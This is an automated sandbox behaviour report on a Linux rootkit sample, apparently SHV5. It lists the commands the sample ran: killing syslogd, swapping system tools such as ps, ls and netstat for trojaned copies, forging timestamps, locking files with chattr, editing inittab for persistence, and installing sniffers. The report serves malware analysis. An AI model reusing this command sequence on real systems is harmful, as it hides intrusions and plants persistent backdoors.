| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/600/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1296/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1499/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/28/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/25/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/204/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/115/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1500/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/513/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1127/stat | /bin/pidof | N/A |
| File opened for reading | /proc/512/status | /bin/ps | N/A |
| File opened for reading | /proc/565/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1127/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/777/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/984/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1136/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/11/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1296/stat | /bin/pidof | N/A |
| File opened for reading | /proc/25/stat | /bin/ps | N/A |
| File opened for reading | /proc/777/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1305/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/160/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/204/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/163/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1248/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/166/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/440/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1183/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/174/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/29/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1119/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1147/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/992/stat | /bin/pidof | N/A |
| File opened for reading | /proc/528/stat | /bin/ps | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/442/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1144/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/137/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/984/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/5/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/161/stat | /bin/pidof | N/A |
| File opened for reading | /proc/468/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/83/stat | /bin/pidof | N/A |
| File opened for reading | /proc/89/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/1016/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1180/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/159/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1310/status | /bin/ps | N/A |
| File opened for reading | /proc/992/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/78/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1142/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/17/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/174/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1068/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/322/status | /bin/ps | N/A |
| File opened for reading | /proc/468/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1284/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1058/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/1505/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/1182/cmdline | /bin/pidof | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/usr/bin/cut
[cut -d @ -f 2]
/bin/grep
[grep @]
/bin/grep
[grep -v ^$]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/sbin/ldconfig.real
[/sbin/ldconfig.real]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/grep
[grep -v getty]
/bin/grep
[grep -v ttyload]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /etc/inittab]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/cat
[cat /tmp/.procs]
/bin/rm
[rm -rf /tmp/.procs]
/bin/grep
[grep http]
/bin/grep
[grep 443]
/bin/cat
[cat /tmp/.stats]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/usr/bin/cut
[cut -c6-]
/usr/bin/awk
[awk -F {print $2} ]
/bin/grep
[grep inet addr:]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/hostname
[hostname -f]
/usr/bin/awk
[awk { print $11 }]
/bin/uname
[uname -a]
/bin/cat
[cat /tmp/info_tmp]
/usr/bin/awk
[awk {print $3}]
/bin/grep
[grep bogomips]
/bin/cat
[cat /proc/cpuinfo]
/bin/hostname
[hostname -i]
/usr/bin/wc
[wc -l]
/bin/grep
[grep eth]
/sbin/ifconfig
[/sbin/ifconfig]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 14 - 12]
/usr/bin/head
[head -5]
/sbin/iptables
[/sbin/iptables -L input]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
Files
/var/cache/ldconfig/aux-cache~
/lib/libsh.so/bash
/tmp/.init1
/tmp/.init1
/tmp/.init1
/tmp/.init1
/tmp/.init1
/usr/sbin/ttyload
/usr/sbin/ttyload
/tmp/.shmd5
/tmp/.shmd5
/tmp/.shmd5
/tmp/.shmd5
/tmp/.shmd5
/usr/lib/libsh/.backup/ps
/usr/lib/libsh/.backup/top
/usr/lib/libsh/.backup/ls
/usr/lib/libsh/.backup/find
/usr/lib/libsh/.backup/pstree
/usr/lib/libsh/.backup/md5sum
/tmp/.procs
/tmp/info_tmp